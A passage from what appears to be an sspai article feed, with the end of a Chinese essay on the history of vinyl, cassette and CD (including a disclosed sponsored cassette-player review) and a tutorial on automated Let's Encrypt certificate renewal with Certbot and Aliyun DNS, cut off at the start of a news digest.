唱片或者密纹唱片。相比起虫胶唱片，它的优势除了能储存更多首歌之外，还比较不容易碎，更耐用也更好保存，音质更清晰信息更丰富，所以很快就代替了虫胶唱片成为了当时主流的音乐载体。不仅如此，因为黑胶可收录的声音音质很高，它反过来也推了当时正在奋力发展的录音技术、声音工程一把，让人们耳朵里能听到的音质越来越好。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/5c56493369bda9f472970855f47f618c.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>当年哥伦比亚唱片给 LP 打的广告（图源：<a href="https://bestclassicbands.com/vinyl-lp-introduced-6-18-15/">BestClassicBands</a>）</figcaption></figure><p>为了对抗 LP 唱片在市场上的势头，美国无线电公司（RCA）也推出了自己的载体。他们认为一张唱片有时候不需要放那么多首歌，于是虽然用的是相同的材料，但他们的唱片规格不同，只有 7 英寸并且转速为 45 转，简称 Extended-Playing Record，也就是 EP。EP 唱片大概有 20 分钟左右的存储时长，可以放 5 首歌在里面。EP 的优势就在尺寸小又薄、易携带、更不易碎，运输成本还低，非常适合讲究时效的单曲市场。看到这里，敏锐的你也许发现了，虽然早已不是用来专门指代黑胶唱片，但 LP 和 EP 这两个名称一直到现在还在使用着，只是现在 LP 指的是 10 首歌左右的专辑，EP 则是 5 首歌左右的迷你专辑。</p><p>关于 EP 唱片，还有一个音乐史上非常重要的创造，那就是 RCA 发明的自动点唱机。不知道大家有没有看过一些时间背景可能在七八十年代的美剧，我们能看到剧里面的酒吧、夜总会或者餐厅，会摆着一台玻璃柜子，旁边可能就是台球桌。柜子里摆放着的就是各种各样的音乐唱盘，大多都是 EP 唱片，顾客丢进去硬币就能挑选播放自己想要听的歌。这种机器很快就流行起来了，而人们为了更快地找到自己喜欢的歌，也开始对音乐进行分类，使得音乐流派逐渐系统化起来。这也就是大众开始对音乐分类的开端。而点唱机也把音乐更多的带到了人们的生活当中，不再只是在家或者在音乐厅才能享受的东西了。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/1dfa23a8407c94a464ee4fff60f49af8.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>酒吧里的点唱机（图源：<a href="https://www.timesunion.com/tuplus-features/article/Well-played-6336111.php">TimesUnion</a>）</figcaption></figure><p>而 LP 对音乐的创作，也有重大的影响，在我看来，最重要的就是所谓「专辑」概念的形成。</p><p>一张 LP 里可以录制 10～12 首歌曲，因此在音乐行业第一次有了多首歌曲组合成合集的包装和制作意识。1967 年，The Beatles 发行的作品《Sgt. Pepper's Lonely Hearts Club Band》，就被视为最早定义出现代专辑形态的的作品<sup class="ss-footnote" href="" title="编者注：此为大众公认结论，但略有争议">1</sup>。这部作品描述了和专辑名一样的虚构乐队，从组建到解散的故事，专辑中的所有歌曲都与这个完整故事有关。这种叙事方式在当时是非常新颖的，它打破了传统专辑歌曲零散的叙事模式，为音乐创作开辟了新的可能性。披头士乐队通过这种概念专辑，进一步展示了自己的音乐才华。</p><figure class="image ss-img-wrapper"><img alt="The Beatles - STEREO REMASTERED - Sgt. Pepper's Lonely Hearts Club Band -  Amazon.com Music" src="https://cdn.sspai.com/2024/04/15/article/335f99f71d38b5608ce41143f123bce2.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>随着全球化的开启，留声机、唱机往全世界的输送，黑胶唱片从 50 年代到 70 年代末 80 年代初，整整三十年的时间都是主流的音乐载体，众多经典的专辑还有音乐都在这个期间诞生。除了刚才提到的披头士之外，Bob Dylan 1966 年的第七张录音室专辑 《Blonde on Blonde》也是一张伟大的作品。里面丰富的歌词、 复杂的音乐结构和创新的录音手法，让它称为摇滚史上最重要的专辑之一，在 2003 年被美国国会图书馆列入国家录音登记册，认为其具有「文化、历史和美学的重要性」。华语音乐也一样出现了非常多经典之作，比如姚苏蓉 1969 年的专辑《今天不回家》，或者是 1971 年邓丽君的歌曲合集《X+Y 就是爱》，里面收录的也是非常经典的歌曲。</p><h2>磁带 Cassette</h2><p>1949 年 10 月 1 号的开国大典上，毛主席在天安门城楼上庄严宣告中国人民共和国成立。这段珍贵的声音材料，你猜猜是当时用什么东西录下来的？</p><p>是细细的钢丝。</p><p>你可能很难想象，一捆捆的细钢丝，就是我们现在经常看到的磁带最原始的模样。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/article/1e07822683034e5e81fbbb54c8f4c5e9.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>Valdemar Poulsen 与他的钢丝录音机（图源网络）</figcaption></figure><p>关于磁带的故事，我们得回到 1888 年，当年有一位叫做奥伯林·史密斯的科学家，提出了一个设想：他认为用电流和磁化现象，可以在钢丝上面对声音做记录和回放，但当时的技术水平还没办法实现这个想法。直到1898年，一位丹麦的科学家叫做波尔森，以这个设想为原理，发明了磁性钢丝录音机，把音频存储在了细钢丝上。</p><p>当声音通过话筒，声波的震动就会转化为电流信号，被传送到录音机磁头的电流线圈中，从而不断产生和这个声音变化相对应的磁场，就是电磁感应。而这个磁场会以不同的强度去磁化运动中的钢丝，这样钢丝就拥有了磁性，并记录下了声音的磁化强度和方向。而把上面的过程逆向处理，就是播放。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/9f98eceb55e6a0d501d58dc80f2b2c11.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>Fritz Pfleumer 和他的磁带机（图源：<a href="https://artsandculture.google.com/asset/photograph-of-the-inventor-of-the-tape-recorder-fritz-pfleumer-with-his-tape-recording-machine-fritz-pfleumer-1881-1945/pgEfPB1RHOP1TA">Google 艺术与文化</a>）</figcaption></figure><p>这在技术上来说是一种新的突破，但用钢丝作为载体却有非常多的不便，不管是录音方式、携带、保存、价格或者是音质，都并不比虫胶或黑胶唱片要好，所以也从来没有被大规模的使用过。后来有一位叫做 Fritz Pfleumer 的科学家想到，既然是要记录磁场，那把细钢丝改为涂上带有磁粉的纸带，理论上也有记录效果，而且这样便于制造和储存，而后续的实验证实他的想法没错。于是在 1928 年，Pfleumer 设计出世界上第一款磁带录音机，现代磁带录音机与磁带的雏形，就此诞生。</p><p>1935 年，德国的工程师们发明了一种有氧化铁涂层的塑料带，用来代替纸带，磁带就此诞生。同时德国的 AEG 公司也得到 Pfleumer 的授权，开始量产磁带录音机。至此，磁带做为最新式的「声音储存」媒介，也进入了我们的视线。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/ef105df2354eeef3141639ca9cf46eff.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>AEG 当年的产品之一，被称为 Magnetophon（图源：<a href="https://en.wikipedia.org/wiki/Magnetophon">维基百科</a>）</figcaption></figure><p>在这之后，这种磁带录音机一直都在进行改良和改进。在这期间，它主要是在军队或者办公室里面使用，因为它的音质还不适合用来录制或者播放音乐。音乐的载体，此时仍然以虫胶以及黑胶唱片为主流。</p><p>直到 1963 年，飞利浦公司把卷好的磁带装在一个只有人的手掌大小的小塑料盒里面，才生产出了我们最熟悉的卡式磁带，每一面可容纳 30～45 分钟的立体声音乐。而当飞利浦在 1964 年公开了卡式磁带的专利与格式，让所有厂商都能免费使用之后，卡式录音带更是开始飞速发展，音质越来越好，存储量越来越高，录音、播放的设备也越来越小越来越方便，让它成为了可以和黑胶一样跻身主流的音乐载体。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/dce8615d9e25335885bdf70c0868db9b.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>而到了 1979 年，索尼制造出了改变未来所有人听音乐习惯的磁带播放器 Walkman 随身听，这也应该是我们所有人最熟悉的磁带机的形态。世界第一台 Walkman 叫做 TPS-L2，在电影《银河护卫队》里，星爵开场用的就是它。它的大小刚好能握在手里，金属质感，以蓝色为、银色为辅，配以橙色做点缀，现在看来颜值也相当高。</p><figure class="image ss-img-wrapper"><img alt="Star-Lord's Walkman | Marvel Cinematic Universe Wiki | Fandom" src="https://cdn.sspai.com/2024/04/15/article/f7ce50e14008c0d327c43a5fbbf74100.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>电影《银河护卫队》剧照</figcaption></figure><p>这种袖珍式卡带录音机一经上市就受到了全球范围的追捧，比起笨重的立式录音机，随身听的尺寸非常小，设计也很前卫。音乐也跟着随身听一起，进入了人们各种生活场景，通勤、课间、公园闲逛、慢跑……用随身听听歌还是一件非常私密的事情，「耳机一戴，谁也不爱」就是从随身听时代开始的，人们享受音乐的方式被大大的改写。</p><figure class="image ss-img-wrapper"><img alt="Boombox | Soul Jazz Records" src="https://cdn.sspai.com/2024/04/16/article/56edd84f3c8a61b1db399a9f2a9b1fd3.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>街头的年轻人和肩上的 Boombox（图源：<a href="https://soundsoftheuniverse.com/sjr/product/early-independent-hip-hop-electro-and-disco-rap">SoulJazzRecords</a>）</figcaption></figure><p>其实在八十年代还出现了一台很有意思的设备叫做 Boombox，这种机器像是一块巨大的砖头，但也算是一种便携式录音机，一般都自带一个手柄和巨大的喇叭。它的功能很多，可以播放卡式磁带、用磁带录音、也能收听广播。如果你熟知七八十年代的街头 Hip-Hop 文化的话，就能在一些经典的场景里看到它。可以说，Boombox 使美国街头的嘻哈音乐文化如虎添翼。这个潮流也吹到了中国，一批中国品牌也随之崛起，其中最为著名的当属在电视上打广告的「燕舞」。一句「燕舞燕舞，一曲歌来一片情」更是成了那个时代中国人的深刻而又亲切的记忆。​</p><figure class="image ss-img-wrapper"><img alt="上世纪的驰名商标“燕舞”是如何死去的_手机搜狐网" src="https://cdn.sspai.com/2024/04/15/article/ce4431b8732637f2f6926c37b7797830.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>燕舞牌双卡收录机广告截图</figcaption></figure><p>想到这种设备可能家里的长辈会更熟一点，我趁这次节目的机会采访了我的岳父。果然发现了岳父原来早在 1984 年就开始听磁带了，第一盘磁带是同年发行的《张行独唱专辑》。因为是双卡收录机，岳父还会自己买很多空白磁带来录音，还会自己画磁带的封面，一首钢笔字也很好看！所以由于这样的家庭氛围，我太太也是从胎教时期就开始听磁带了，她的回忆里最早爸爸给她买的磁带是发行于 1993 年的金铭的《小天使》，还有当时红遍大江南北杨钰莹和毛宁合唱的《心雨》等等很多八九十年代传唱度非常高的内地及港台流行歌曲。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/7aaf9e8e874287fcbd49082ad6e320a0.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/92ac71df1fa7134ed249c411fdc9ae62.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>所以比起黑胶，我相信对于许多 80、90 后来说磁带才是青春岁月真正的象征。是不是每个人都会曾经拿铅笔把磁带的带子卷回盒子里？是不是都抄过磁带里的歌词？或者跟别人交换过磁带？是不是每个人也都用磁带机听过广播，或者用它录过自己喜欢的歌？</p><p>拥有一台磁带机，是曾经许多包括我在内的乐迷的向往。可惜因为技术和时代的变迁，现在市面上还在量产专注于音乐播放的磁带机的厂商已经相当少见。国内的飞傲是其中之一。他们最近为了满足自己的情怀，不赚钱也要做出来进行量产的新产品，叫做 CP13。这是他们在磁带行业相关的供应链近乎断裂的情况下，投入了大量成本，在缓慢的推进中终于做出来的磁带机。这次合作他们也给我寄了一台，我拿到之后真的是爱不释手，尤其是颜值。虽然 CP13 是因为怀旧而来，但是它的外表却充满现代简约美感，正正方方的形体，天蓝色的前盖还有银色的机身，因为有点小磨砂的金属材质所以显得质感蛮不错的。当然颜值这个见仁见智，我自己是很喜欢。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/15/f4d9541bddeeffc96e0928c2e819de46.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/15/cd2488059541fd6b4f82560f4b064461.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>还有重点是它的播放效果，我用它听了我在日本买的山下达郎的专辑《Ride on Time》20 周年纪念磁带，声音听起来真的很舒服，是磁带才有的那种温暖质感，是 100% 纯正的模拟声音。CP13 采用了定制的机芯、磁头，还有超大的纯铜飞轮和高压马达，所以晃抖率非常低，播放速控制得非常稳，整个过程都很享受。按下停止键，听到「咔哒」一声，然后把磁带拿出来翻面……使用 CP13 的时候，这一系列动作一下子让我回到了小时候，那种我重复过无数次的肌肉记忆，还有听歌的那种仪式感，觉得很怀念，也有些感动。如果你也想怀旧复古，或者听听看曾经是主流的磁带音乐是什么感觉的话，我觉得 CP13 是一个很不错的磁带机的选择。</p><h2>CD、MP3、流媒体</h2><p>其实就在 TPS-L2 发布的同一年，CD 的原型就已经被发明出来了。为了追求更高质量的音频存储，飞利浦和索尼联合联手利用当时的激光技术来改进音乐载体，发明了所谓的「数字音乐」以及 Compact Disc，也就是 CD。说起来也许很讽刺，前者发明了卡式磁带，后者发明了磁带随身听。他们联手做出了这张薄薄的小圆片，结束了磁带和黑胶黄金年代。</p><p>CD 迅速成为了新的主流，索尼的 Walkman 随身听也推出了播放 CD 的型号，继续席卷全球。我还记得我的第一张音乐 CD 是在小学四年级的时候，那应该是 2002 年，我用存了很久的钱在家附近的一家小唱片行盲买了一张叫《人生海海》的专辑。当时我还不认识五月天，回家听了之后就被震撼了，声音非常清晰，每首乐器的声音都能分辨出来，这和听磁带的感受不一样。初中时还会预购周杰伦的 CD，记得当时在学校附近的新华书店预定了周杰伦的专辑，日子到了去拿，怕《魔羯座》的封面被人看到会尴尬，一路上回家也不敢把专辑拿出来。虽然有点嫌弃，但是当我用大拇指和中指把 CD 拿出来放到播放器的时候，还是很开心很兴奋。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/82b3739a1804f1c9a78efff1276b0ca2.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>发布于 2001 年的《人生海海》，青涩的五月天</figcaption></figure><p>在青少年的时候，磁带和 CD 是我对音乐表达虔诚最重要的东西。但很快，CD 的时代也过去了，1995 年 MP3 格式的音乐出现了，1998 年韩国的三星发明了 MP3 播放器，2001 年苹果推出了 iPod，国产品牌大大小小也跟上了这阵风，爱国者、海贝、七彩虹、纽曼……也都推出了自己五颜六色甚至称得上奇形怪状的 MP3 播放器，甚至是带视频的 MP4 播放器。我当年很晚才买了 MP3，也不是牌子货，只是在家楼下的小商品市场买的一个杂牌。从那之后，我也就学会了在网上下载盗版音乐，百度 MP3、酷狗音乐、电驴……都是我下载音乐的主阵地。尤其是电驴，在那上面我接触到了非常多的小众音乐。</p><p>当时看着网上那么大量的音乐，我同样很兴奋，似乎一下子就把磁带和 CD 给遗忘了。紧接着，串流平台也出现了。网易云、QQ音乐、Apple Music、Spotify、Tidal、Bandcamp、SoundCloud……太多了，连 B 站还有 YouTube 也都能听歌了。从这些平台，可以听到我们这一辈子都听不完的歌，永远有旧的，也永远有新的。</p><p>实体音乐的黄金时代，随着千禧年的到来，结束了。</p><h2><strong>结尾</strong></h2><p>去年我到日本旅游，去了东京很有名的唱片店 Tower Records，在里面逛了好几个小时。当我看到摆放的满满当当、整整齐齐的各种黑胶、CD 甚至还有磁带，我就是会忍不住去看，去摸他们的封面，去摸他们的塑料壳子，然后找旁边挂在墙上架子上的试听机器里有没有我感兴趣的碟片可以播放。当我买了一张实体唱片，无论是黑胶、磁带还是 CD，除了音乐之外，其实还有很多重要的要素会让我着迷，比如唱片本身的样式，歌词本的内容，专辑封面和封底，专辑制作的信息等等。很多时候，从这些设计上，我也可以感受到一些制作时的想法，也会有那种「这首歌是这样做出来的啊」，或者「原来是这样才会这种感受啊」的想法。这种物理上的互动让听音乐变得更有趣。这是现在的音乐串流没办法提供的体验和价值，我觉得实体让音乐多了一种温度，也多了一些审美的角度，而并非单纯只是听觉而已。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2019/06/29/9a9ac2db1e3531c92614b9211ba70358.gif" /><figcaption>本文编辑在大阪 Tower Records 偶遇的激情大叔</figcaption></figure><p>&nbsp;</p><p>黑胶、磁带和 CD 曾经作为主流的音乐存储媒介，它陪伴了许多人的成长过程，他们的音乐品味、生活情趣和社交活动会与磁带紧密相连。例如交换磁带、给朋友录制精选集等等，这都是独特的文化现象。哪怕在实体音乐退出主流以后，这个现象也延续到了现在。所以我觉得其实对于许多人来说，热爱实体的音乐并非是怀旧而已，这反而是许多没接触过实体唱片的人，可以获得一种全新体验的窗口，甚至是现在年轻乐迷的新潮流。我们到底要怎么去聆听音乐？是只用耳朵？还是让我们的眼睛和手，也一起去听呢？我始终相信，多一个维度，我们对音乐的欣赏和感受，也就会多一些感动的可能。</p><p>如果想要获得这种体验，我觉得最好最直接的方法，还是去逛唱片店。在「世界唱片店日 Record Store Day」这个节日，广州有四家风格各异的唱片店——Portal、Soulless Tune、臻音堂、Disc Joker——将会联手少数派与飞傲，在 4 月 19～21 日策划一系列的线下活动。</p><figure class="image ss-img-wrapper image_resized" style="width: 355px;"><img src="https://cdn.sspai.com/2024/04/16/dc8c04743684925e5d20270ba07561ee.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>活动海报，详细信息持续更新中</figcaption></figure><p>这几天你只要走进这几家唱片店，都可以找到飞傲的 CP13 磁带机优惠套装。而且这些活动还有一个小彩蛋，就是专为 RSD 限量的发行磁带。这张磁带的内容真的很有意思，我就先卖个关子啦！如果你在广州的话，不妨可以去探索一下~</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/15/732179bee05137bba6387bc15eca93e5.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/15/a2eb18fb92eee514fa0d19257828bc58.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>好啦，这期节目到这里也就结束了，最后再次感谢少数派与飞傲对本期节目的支持。也感谢收听 Vibration 歪波音室，本节目是一档以乐迷的视角去分享音乐的播客节目，我想用自己的力量，让你听到更丰富的音乐。</p><p>期待下次见面，一起听更多好音乐。</p><p>文章题图：<a href="https://unsplash.com/@kxvn_lx?utm_content=creditCopyText&amp;utm_medium=referral&amp;utm_source=unsplash">Kevin Laminto</a></p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88127</id>
            <title>一日一技 | 一篇教你搞定 SSL 证书监控和续签</title>
            <link>https://sspai.com/post/88127</link>
            <guid isPermaLink="false">https://sspai.com/post/88127</guid>
            <pubDate></pubDate>
            <updated>Wed, 17 Apr 2024 03:38:32 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 数字证书颁发机构, TRUSTASIA, SSL证书, 自动续签
<br>
<br>
总结: 光网宣布停止签发为期一年的TRUSTASIA单域名SSL证书，意味着使用免费证书的网站需要每3个月进行一次续期。文章介绍了Certbot自动续签和CDN手动续签的方法，以及如何申请免费的泛域名证书简化域名管理流程。 </div>
                        <hr>
                    
                    <p>数字证书颁发机构 Gworg（光网）宣布，从 2023 年 12 月 31 日开始，将停止签发为期一年的「TRUSTASIA」单域名 SSL 证书，这是市场上最后一款提供一年期免费 SSL 证书的产品。</p><p>鉴于阿里云等国内服务商广泛采用此证书，这意味着使用免费证书的网站需要<strong>每 3 个月进行一次续期</strong>。而网站的 SSL 证书一旦过期，网站便无法通过 HTTPS 安全访问，在主流浏览器中将无法打开，或者会显示安全警告。这一调整使得管理多个域名或子域的难度显著增加，许多个人网站和图床也面临因证书过期而暂时下线的威胁。</p><p>本文将介绍几种有效的 SSL 证书续签和监控方法，并通过申请免费的泛域名证书来简化域名管理流程。</p><h2>Certbot 自动续签</h2><p><a href="https://certbot.eff.org/">Certbot</a> 是一个免费的开源应用，用于自动获取并续签 Let's Encrypt 提供的 SSL/TLS 证书。Certbot 支持泛域名的免费 SSL 证书，用户仅需一次性申请，即可实现对所有子域名的覆盖，大大简化了证书的管理工作。然而，Certbot 的自动续签功能依赖于 80 端口的访问，这在国内的家用宽带环境中常常受限。针对这种情况，可以使用反向代理工具 <a href="https://newzone.top/services/dockers-on-nas/reverse-proxy.html#nginx-proxy-manager">Nginx Proxy Manager</a> 来实现自动续签。</p><figure class="image ss-img-wrapper"><img alt="XZg2byppjoqurpx5UfbcAAH0nWb" src="https://cdn.sspai.com/editor/u_/cofirolb34te092f6cqg.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>以下是使用 Certbot 在 Debian 11 系统上，通过 <code>certbot-dns-aliyun</code> 插件自动获取和续签阿里云托管域名的泛域名 SSL 证书的具体步骤。如果你使用的是其他域名托管服务，如 Cloudflare，则将插件替换为 <code>certbot-dns-cloudflare</code>，其他步骤相同。</p><h3>1. 安装 Certbot 和插件</h3><p>首先，安装 Certbot：</p><pre class="language-bash"><code>sudo apt update

sudo apt install certbot
</code></pre><p>然后，安装 <code>certbot-dns-aliyun</code> 插件，以允许 Certbot 自动配置 DNS 记录，验证域名所有权。由于这个插件不在 Certbot 的官方仓库中，你可能需要使用 pip 来安装：</p><pre class="language-bash"><code>sudo apt install python3-pip

sudo pip3 install certbot-dns-aliyun
</code></pre><h3>2. 配置 AccessKey 凭证</h3><ol><li>在阿里云控制台创建一个拥有 DNS 配置权限的 AccessKey 密钥。</li><li>创建一个文件来保存你的 AccessKey 凭证，并确保文件权限安全：</li></ol><pre class="language-bash"><code>sudo mkdir /etc/letsencrypt
sudo touch /etc/letsencrypt/aliyun.ini

sudo chmod 600 /etc/letsencrypt/aliyun.ini
</code></pre><ol><li>编辑 <code>/etc/letsencrypt/aliyun.ini</code> 文件，输入你的 AccessKey 密钥信息：</li></ol><pre class="language-plaintext"><code>dns_aliyun_access_key = YOUR_ACCESS_KEYdns_aliyun_access_key_secret = YOUR_ACCESS_SECRET
</code></pre><h3>3. 使用 DNS 插件获取证书</h3><p>运行 Certbot 并指定 DNS 插件及配置文件：</p><pre class="language-bash"><code>sudo certbot certonly \--authenticator dns-aliyun \
  --dns-aliyun-credentials /etc/letsencrypt/aliyun.ini \

  --dns-aliyun-propagation-seconds 60 \-d "*.newzone.top" \-d newzone.top
</code></pre><p><code>-d</code> 参数用于指定你想要证书覆盖的域名。上方的命令会为 <code>newzone.top</code> 和所有子域 <code>*.newzone.top</code> 获取证书，证书在同一个文件。如果有多个域名，可以用 <code>-d</code> 添加多个参数。</p><h3>4. 自动续签证书</h3><p>Certbot 默认会设置自动续签。你可以通过以下命令测试续签是否成功：</p><pre class="language-bash"><code>sudo certbot renew --dry-run
</code></pre><p>如果测试成功，Certbot 将自动处理证书续签。当证书剩余有效期不足 30 天时，系统便会自动续签，将有效期恢复至 90 天。</p><p>在使用 Certbot 与某些云服务提供商（如阿里云）进行首次自动续签时，Certbot 的自动续签行为有时可能被云服务平台误认为是异常的 Access Key 调用行为，导致系统自动触发安全警报。比如，阿里云半夜给我打电话通知风险（还好我开启了免打扰，尽管这类通知十分必要）。如果你接收到了此类通知，不必太担心，只需进行正常检查即可。</p><h2>CDN 手动续签</h2><p>对于使用图床或 CDN 服务的用户，由于云服务商的授权问题，证书可能无法通过 Certbot 等服务自动续签。例如，阿里云和七牛云都提供了 SSL 证书的相关接口，但根据客服的说法，这些接口并不能用于替换 CDN 的域名证书，自动续签只支持付费 SSL 证书，免费用户<strong>必须手动执行证书续签过程</strong>。</p><p>即使是手动续签，你依然可以继续使用通过自动化工具获得的泛域名证书。下面介绍手动续签的具体步骤：</p><p><strong>一、定位证书文件</strong></p><p>Certbot 的泛域名证书通常存放在 <code>/etc/letsencrypt/live</code> 目录下。对于使用 nginx-proxy-manager 的用户，证书则存储在 <code>config/letsencrypt/archive</code> 目录中，该目录下包含多个以 <code>npm-</code> 开头的编号文件夹，例如 <code>npm-1</code>，这里的数字表示证书的申请序号。</p><figure class="image ss-img-wrapper"><img alt="QGA3bPCi0oU4TuxQ6RLcYw3MnVf" src="https://cdn.sspai.com/editor/u_/cofirotb34te0b9k2cj0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>二、上传证书至 CDN</strong></p><p>在 CDN 的管理界面中自定义上传证书来替换旧的泛域名证书。粘贴 <code>fullchain.pem</code> 文件的内容作为证书（公钥），<code>privkey.pem</code> 文件的内容作为私钥。</p><figure class="image ss-img-wrapper"><img alt="J5SRbBirZoxAFyxQGRfcQYXTn6d" src="https://cdn.sspai.com/editor/u_/cofirp5b34te0f7uaqk0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><h2>SSL 证书监测</h2><p>定期监测 SSL 证书的状态是维护网站安全和可靠性的关键环节。这不仅有助于确保数据传输的加密，还能及时发现并解决证书过期或其他相关问题，避免网站访问受到影响。</p><p>我使用 <a href="https://newzone.top/services/dockers-on-nas/uptime-kuma.html">Uptime Kuma</a> 来监控 SSL 证书的状态，以下是监控设置步骤：</p><ol><li>进入 Uptime Kuma 实例，点击右侧「+」按钮来添加一个新的监控项目。</li><li><strong>选择监控类型</strong>。对于 SSL 证书监控，选择「HTTP(s)」类型，因为这涉及到监测一个使用 SSL 证书的网站或服务。</li><li>在下方「高级」设置中，勾选启用「证书到期时通知」。</li></ol><figure class="image ss-img-wrapper"><img alt="HGhtbadIzohx0bxHS4Pcnk9zn0e" src="https://cdn.sspai.com/editor/u_/cofirpdb34te0f7uaqkg.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>完成这些步骤后，Uptime Kuma 将开始监控指定网站的 SSL 证书状态。如果证书接近到期日期，你将根据你的通知设置收到警报。Uptime Kuma 默认会在 TLS 证书剩余有效期少于 21 天、14 天、7 天时发送提醒通知。你也可以在设置&gt;通知&gt;TLS 证书过期通知，修改提前通知天数。</p><h2>更多</h2><p>我很难理解国内云服务商对 SSL 证书的做法。提高 SSL 证书费用的同时增加免费证书续签的难度，这样的策略似乎是为了鼓励用户购买付费证书。然而，这种做法可能没有充分考虑到国内用户的付费习惯。对于像我这样的用户，云服务开销主要集中在服务器和 CDN 流量上，不会考虑昂贵的 SSL 证书。目前市场上，单域名 SSL 证书的年费用已超过 300 元，若需覆盖多个子域名，则需购买泛域名证书，费用更是高达 1000 元以上，这甚至超过了我为服务器所支付的费用。</p><p>云服务商的这种定价策略可能源自他们自身面临的高运营成本，如昂贵的商业宽带费用等。面对这样的压力，他们可能无奈地将成本转嫁到 SSL 证书等终端产品上。尽管这可以理解，但对于像我这种个人用户来说，当 SSL 证书的开销超过服务器本身时，显然难以接受。这也是我写这篇文章的原因。</p><p style="margin-left: 0px;">&gt; 下载少数派&nbsp;<a href="https://sspai.com/page/client">客户端</a>、关注&nbsp;<a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F63f5d65d000000001001d8d4" target="_blank">少数派小红书</a>，感受精彩数字生活 🍃</p><p style="margin-left: 0px;">&gt; 实用、好用的&nbsp;<a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88125</id>
            <title>派早报：影石发布 8K 全景运动相机 X4 等</title>
            <link>https://sspai.com/post/88125</link>
            <guid isPermaLink="false">https://sspai.com/post/88125</guid>
            <pubDate></pubDate>
            <updated>Wed, 17 Apr 2024 00:00:00 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 影石 Insta360, Adobe Premiere Pro, YouTube, 百度 DuerOS X
<br>
<br>
总结: 4 月 16 日发布的新产品包括影石 Insta360 的 8K 全景相机 X4、Adobe Premiere Pro 加入 AI 功能、YouTube 加强对第三方应用的检测、百度发布 AI 原生操作系统 DuerOS X。 </div>
                        <hr>
                    
                    <h2>你可能错过的新鲜事</h2><h3>影石 Insta360 发布 8K 全景运动相机 X4</h3><p>4 月 16 日，知名智能影像品牌影石 Insta360 推出新一代旗舰全景相机 X4。X4 为影石首款面向大众消费者的 8K 全景相机，最高可拍摄 8K 30 帧或 5.7K 60 帧超高清全景视频、7200 万像素照片，机内搭载 AI 降噪处理功能，支持一键直出更纯净的画面，全景延时摄影分辨率也提升到了 11K。除此之外，影石还为 X4 推出可拆卸保护镜以提升镜头耐用性，拍摄续航最长也延至 135 分钟，同时搭载 2.5 英寸耐磨触摸屏。</p><figure class="image ss-img-wrapper"><img alt="MjnXb5eOzoBZRYxUDsHcoMSHnyb" src="https://cdn.sspai.com/editor/u_/cofb035b34te05l6rdtg.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>配套应用方面，影石还在其移动端 app Insta360 推出了「快剪」和 「AI 取景」功能。X4 现已于影石官方商城等多平台发售，售价 3499 元起。<a href="https://news.insta360.com/ying-shi-insta360fa-bu-x4-8khua-zhi-zui-qiang-quan-jing-yun-dong-xiang-ji-lai-liao/">来源</a></p><h3>Adobe 将为 Premiere Pro 加入 AI 功能</h3><p>Adobe 于 4 月 16 日宣布为其专业视频编辑软件 Premiere Pro 加入一系列由生成式人工智能驱动的功能，如为视频片段添加额外帧、添加或移除视频中的物体和不必要元素、为人物更换虚拟服装、向视频场景添加装饰物等；同时通过「文本转视频」功能用户还可以直接在 Premiere Pro 中通过文本描述或参考图片生成全新的视频片段，生成的片段可用于制作 B-roll、创建故事板等多种用途。Adobe 计划于 2024 年晚些时候推出这些工具。<a href="https://www.macrumors.com/2024/04/15/adobe-premiere-pro-ai-tools/">来源</a></p><h3>YouTube 